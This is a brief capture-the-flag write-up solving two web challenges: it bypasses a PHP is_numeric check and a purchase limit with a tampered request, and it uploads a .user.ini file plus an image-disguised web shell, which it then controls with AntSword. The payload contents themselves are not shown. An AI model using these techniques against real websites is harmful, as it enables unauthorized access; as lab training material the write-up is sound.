Buuctf[Geek Challenge 2019]BuyFlag 1
Enter the environment
Click this option under the menu list in the upper left corner to enter this interface
After viewing the source code with F12, I found that this string of code analysis code
Post method passes in two parameters-password and money. The password must bypass the is_numeric function, and the password must contain 404, so that the password is equal to 404b, and the bypass function is completed again. Match with the password, according to the meaning of the title, you need 100000000 to buy the flag, so use bp to capture the packet
Then go to the repeater interface to change the parameter money and enter 100000000. It will prompt that the number is too long, so I use scientific notation to indicate
it.
[SUCTF 2019]CheckIn 1
Learn about the .user.ini file before doing this. For details, please
refer to the blog of this big guy https://blog.csdn.net/byywcsnd/article/details/78221375
First construct a .user.ini file content as above and then construct a.jpg file content as follows
Then upload the files separately and you will get feedback
And I found the third thing index.php
to try to connect with Ant Sword
Found this, use the Linux cat command to get the final flag
